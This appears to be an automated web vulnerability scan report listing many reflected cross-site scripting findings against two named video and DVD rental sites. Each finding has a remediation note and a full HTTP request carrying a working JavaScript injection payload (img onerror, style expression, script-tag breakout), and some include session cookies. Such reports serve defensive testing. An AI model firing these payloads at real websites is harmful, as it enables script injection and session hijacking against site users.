HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:40:08 GMT Server: Apache Set-Cookie: subscriber=c763f71518c6e5328f48bfc68127e54f; path=/ Set-Cookie: cobrand=deleted; expires=Mon, 23-Nov-2009 03:40:08 GMT; path=/ Set-Cookie: voucherId=15401; expires=Tue, 30-Nov-2010 03:40:08 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 71574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a499"><a>b747d287eda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dvd/1a499"><a>b747d287eda/Too-Late-To-Say-Goodbye?a=15401&utm_source=promotile100x70&utm_medium=online&utm_campaign=bpcomtile&cid=ZBP_MOV_Too-Late-To-Say-Goodbye_100x70_231110 HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:39:44 GMT Server: Apache Set-Cookie: subscriber=627167c3b053d9adccbb197c95136aaa; path=/ Set-Cookie: cobrand=deleted; expires=Mon, 23-Nov-2009 03:39:44 GMT; path=/ Set-Cookie: voucherId=15401; expires=Tue, 30-Nov-2010 03:39:44 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 71275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c378"><img%20src%3da%20onerror%3dalert(1)>bd79f83f7c0 was submitted in the REST URL parameter 2. This input was echoed as 5c378"><img src=a onerror=alert(1)>bd79f83f7c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /dvd/5c378"><img%20src%3da%20onerror%3dalert(1)>bd79f83f7c0/Too-Late-To-Say-Goodbye HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:50:14 GMT Server: Apache Cache-Control: Expires: Pragma: Etag: "144d1310ed263ac7711d9ca10630c7bc" Set-Cookie: subscriber=03fd168c6ff1d61bb0632ea78d363e6e; path=/ Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:14 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 71313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5fe"><img%20src%3da%20onerror%3dalert(1)>d6bb661fb53 was submitted in the REST URL parameter 3. This input was echoed as 3f5fe"><img src=a onerror=alert(1)>d6bb661fb53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /dvd/161286/Too-Late-To-Say-Goodbye3f5fe"><img%20src%3da%20onerror%3dalert(1)>d6bb661fb53 HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:50:54 GMT Server: Apache Cache-Control: Expires: Pragma: Etag: "6716df96dbbb698ece680db9fd5ebd88" Set-Cookie: subscriber=349625a2be2958ca9dbe8fd31a8f6d47; path=/ Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:54 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 71438
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80db7"%3b4b75db6127e was submitted in the REST URL parameter 2. This input was echoed as 80db7";4b75db6127e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dvd/80db7"%3b4b75db6127e/Secret-Diary-Of-A-Call-Girl-Series-03! HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:50:08 GMT Server: Apache Cache-Control: Expires: Pragma: Etag: "7695f7ac93f932bc1fb7bdf490b1ad52" Set-Cookie: subscriber=fd5c0374efa206641dad4393804454b7; path=/ Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:08 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 71240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e44"%20style%3dx%3aexpression(alert(1))%2087a7b1443b1 was submitted in the REST URL parameter 2. This input was echoed as 64e44" style=x:expression(alert(1)) 87a7b1443b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /dvd/64e44"%20style%3dx%3aexpression(alert(1))%2087a7b1443b1/Secret-Diary-Of-A-Call-Girl-Series-03! HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:50:05 GMT Server: Apache Cache-Control: Expires: Pragma: Etag: "32cb0d8aaa4df4c43e6d0a15acd75744" Set-Cookie: subscriber=57926fbbde89cf34fa78b7abad47dbbf; path=/ Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:05 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 70925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8336"><img%20src%3da%20onerror%3dalert(1)>2c023b98a32 was submitted in the REST URL parameter 3. This input was echoed as d8336"><img src=a onerror=alert(1)>2c023b98a32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03!d8336"><img%20src%3da%20onerror%3dalert(1)>2c023b98a32 HTTP/1.1 Host: dvd.bigpondmovies.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 02:50:33 GMT Server: Apache Cache-Control: Expires: Pragma: Etag: "1e159a70a86388ff6a73c9f5fac96d4a" Set-Cookie: subscriber=0730c94f0d19a54b758b4cc22399037b; path=/ Set-Cookie: voucherId=4; expires=Tue, 30-Nov-2010 02:50:33 GMT; path=/ Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Content-Length: 72322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
2.526. http://iad.bigpondvideo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://iad.bigpondvideo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c29c1</script><script>alert(1)</script>cbeed6bfae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c29c1</script><script>alert(1)</script>cbeed6bfae2=1 HTTP/1.1 Host: iad.bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:38:59 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb37535f9b7&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&c29c1</script><script>alert(1)</script>cbeed6bfae2=1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the allowOverlays request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d233a</script><script>alert(1)</script>38d32f44ab8 was submitted in the allowOverlays parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1d233a</script><script>alert(1)</script>38d32f44ab8&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the allowPreBuffer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 544a9</script><script>alert(1)</script>a4ed5b9946f was submitted in the allowPreBuffer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0544a9</script><script>alert(1)</script>a4ed5b9946f&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the autoStart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13481</script><script>alert(1)</script>3a8131221a8 was submitted in the autoStart parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=013481</script><script>alert(1)</script>3a8131221a8&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the bFinish request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9769e</script><script>alert(1)</script>77759cae366 was submitted in the bFinish parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=19769e</script><script>alert(1)</script>77759cae366&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eebc"><script>alert(1)</script>987d0864e9b was submitted in the bgColor parameter. This input was echoed as 1eebc\"><script>alert(1)</script>987d0864e9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=0000001eebc"><script>alert(1)</script>987d0864e9b&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the bgColor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8eae6</script><script>alert(1)</script>c4f734a3b63 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=0000008eae6</script><script>alert(1)</script>c4f734a3b63&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the cStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e4b</script><script>alert(1)</script>c8187299e75 was submitted in the cStyle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5f1e4b</script><script>alert(1)</script>c8187299e75&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... = navigator.userAgent.toLowerCase(); var allowFullScreen = "1"; var allowStf = "0"; var assetColor = ""; var assetLoadedTimeout; var controlsType = "internal"; var cStyle = "5f1e4b</script><script>alert(1)</script>c8187299e75"; var defaultLeftMargin = 0; var domain = "http://iad.bigpondvideo.com/"; var initParams; var InternetExplorer = navigator.appName.indexOf("Microsoft") != -1; var isError = false; va ...[SNIP]...
The value of the cStyle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b457"><script>alert(1)</script>b186210ef6 was submitted in the cStyle parameter. This input was echoed as 1b457\"><script>alert(1)</script>b186210ef6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=51b457"><script>alert(1)</script>b186210ef6&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the cStyle request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 621e0</script><script>alert(1)</script>3603979df9f was submitted in the cStyle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5621e0</script><script>alert(1)</script>3603979df9f&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the controls request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 684e9</script><script>alert(1)</script>6557bf3be13 was submitted in the controls parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
